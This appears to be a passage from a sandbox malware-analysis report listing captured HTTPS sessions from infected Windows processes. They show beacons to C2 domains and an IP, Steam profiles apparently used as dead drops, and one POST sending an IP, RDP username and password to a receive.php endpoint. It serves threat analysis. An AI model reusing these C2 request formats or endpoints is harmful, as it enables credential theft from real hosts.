Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:12 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:12 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 Data Ascii: ------DBFBFBGDBKJJKFIEHJDBContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------DBFBFBGDBKJJKFIEHJDBContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------DBFBFBGDBKJJKFIEHJDBCont
2024-09-26 22:15:13 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:13 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49773	172.67.162.108	443	1220	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:12 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drawzhotdog.shop
2024-09-26 22:15:12 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:13 UTC	766	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ofb1b5c6jkpc33l11a3vo7ajim; expires=Mon, 20 Jan 2025 16:01:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oq2g4IHpi1cbFDXGqtGiP0ANSzj%2FMuyLTxBr%2B8Zhz3td0Atv3On48bMnLQ%2Fk2Uj3PjzBm0U1g3OImLwc583muYWpf2qsFffVo3xhfkZRTFxjzji7qupq06AfxIMo5382fHr2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969c82986642e3-EWR
2024-09-26 22:15:13 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49775	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:13 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:13 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 Data Ascii: ------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------EHIDAKECFIEBGDHJEBKKCont
2024-09-26 22:15:14 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49776	188.114.96.3	443	1220	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:13 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fragnantbui.shop
2024-09-26 22:15:13 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:14 UTC	766	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=09scgboql2d8a8tjvoiaobmfcu; expires=Mon, 20 Jan 2025 16:01:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BD5jU9MrTdCImL8yenbAPaMD%2F7KK5aJeIiYBLxWApOZYS2sOxg0xhLGZF4dMvzYkzf%2B0yXYQBbkvOmibyoBBLjAjuN%2FcEw3o5zpEaem5CxnhCgn5eZj05BDqQQ7z2o9A5sT4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969c888b527cae-EWR
2024-09-26 22:15:14 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49777	188.114.97.3	443	1220	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:14 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: stogeneratmns.shop
2024-09-26 22:15:14 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:16 UTC	776	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=36el3n1is103thnlfno80jgimn; expires=Mon, 20 Jan 2025 16:01:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gzjX68uOprJd95Xh%2B84mlaK5zBk2A0Z81wXDafGqV1Dke%2BJZRlhNAfUzCEyZbYtaaC%2F%2B%2FGlSqlUnJHh4AbD9FcxnPC2PHfWnoJm9AcFpACqsP5X1GVugR8KHB9icsggE0Inf9hg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969c8ebb0d18ea-EWR
2024-09-26 22:15:16 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49779	172.67.208.139	443	1220	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:16 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: reinforcenh.shop
2024-09-26 22:15:16 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:18 UTC	796	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e2814fduhiu1pijpqog2l4kr22; expires=Mon, 20 Jan 2025 16:01:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XEP5bPWzww6mxmBSSV51hY%2B4T7Sdtk5LBj%2FZ7tlGsKlLdGKXJlwifVnPQvXNsKi8R%2FJ1MBKh98xjZxh637KR2jS9UolJZ5grSpqS3IXccHXbjh9eU6TvBQhibeS8lF5Mt4DI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969ca03b1d42e1-EWR alt-svc: h3=":443"; ma=86400
2024-09-26 22:15:18 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49780	104.102.49.254	443	1220	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:18 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-09-26 22:15:19 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 22:15:19 GMT Content-Length: 34663 Connection: close Set-Cookie: sessionid=2dc448062533e99854c1b8ae; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 22:15:19 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 22:15:19 UTC	16384	IN	Data Raw: 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 Data Ascii: ernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" a
2024-09-26 22:15:19 UTC	3765	IN	Data Raw: 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 Data Ascii: e info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content "><div class="p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49781	172.67.128.144	443	1220	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:20 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ballotnwu.site
2024-09-26 22:15:20 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:20 UTC	774	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gf190kdknut4qo9uklc77f1voc; expires=Mon, 20 Jan 2025 16:01:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F5g8enN0p7HB8Sqs4Z0AwpUEQeppwg8hwUbrrUZvYcQRqYWBpkKGrbRLSCNWxWAPPhRzJfC9E%2BT2ANVpvsIVim1W%2FpvtskKyq9e5Y%2F56S06BCRUpLvAauXJbb8R%2Bxx0RnQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969caf0a6c1879-EWR
2024-09-26 22:15:20 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49785	188.114.96.3	443	3396	C:\ProgramData\AFHDGDGIID.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:35 UTC	165	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: hansgborn.eu Content-Length: 58 Expect: 100-continue Connection: Keep-Alive
2024-09-26 22:15:35 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-26 22:15:35 UTC	58	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 75 73 65 72 3d 52 44 50 55 73 65 72 5f 66 65 63 38 31 30 36 61 26 70 61 73 73 77 6f 72 64 3d 44 6c 52 63 6d 56 51 57 63 30 49 36 Data Ascii: ip=8.46.123.33&user=RDPUser_fec8106a&password=DlRcmVQWc0I6
2024-09-26 22:15:36 UTC	605	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9CeM4%2BOu4BBIRGfDLXf9K81fAXox8sX%2BUuSti8T%2F67jpmoqOK0s6%2BT2A2aXDBMURafoqIfMDyp4DvQcdmx59zEJPpGU8f1zhPPTLAUAzmohDL08odZku%2Bw43XLUcqL4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969d1058b243fa-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49786	104.102.49.254	443	1144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:40 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:40 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 22:15:40 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=b1c5d99d14993d8aba4933fd; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 22:15:40 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 22:15:40 UTC	16384	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-09-26 22:15:40 UTC	3768	IN	Data Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f Data Ascii: vate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
2024-09-26 22:15:40 UTC	59	IN	Data Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: </div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49787	5.75.211.162	443	1144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:41 UTC	185	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
